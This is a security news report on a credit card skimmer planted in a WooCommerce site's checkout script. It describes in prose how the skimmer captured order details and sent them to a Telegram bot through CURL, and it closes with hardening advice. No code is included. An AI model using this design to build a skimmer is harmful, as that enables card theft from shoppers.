A WooCommerce credit card skimmer has been observed using the Telegram bot to exfiltrate stolen data. The skimmer was spotted after multiple cases of credit card theft were reported on an eCommerce website.
A skimmer on the website
At first, the website owner received complaints from multiple customers who reported bogus transactions on their cards just after making some payment on a website.
Just three days after the first case of credit card theft was reported, an investigation was launched. Researchers observed that a number of files were modified over the weekend.
Further, they quickly discovered two files laden with a credit card skimmer.
The payload was associated with the Place Order button on the checkout page of the website. The payload uses Telegram APIs to send exfiltrated credential details to the attacker’s server via CURL.
The payload and Telegram
The first portion of the credit card skimmer was found inside the script[.]js file, where a custom file was added to the well-known Storefront WooCommerce theme and inserted at the checkout page.
As soon as any order is placed on the infected website, the credit card details are sent to a Telegram chat room. Subsequently, they are sold on the black market, which results in bogus transactions on credit cards.
The script.js file
The file performs the following actions:
It receives the input provided to it and adds a user agent and IP information.
Further, it decodes the base64 encoded content and uses Telegram API to send content to a designated chat bot through CURL.
WooCommerce has now become one of the top CMS platforms for credit card skimming malware. Thus, eCommerce website owners are suggested to keep all their software up to date, use strong passwords, and firewall services, and protect the admin panel from unauthorized access.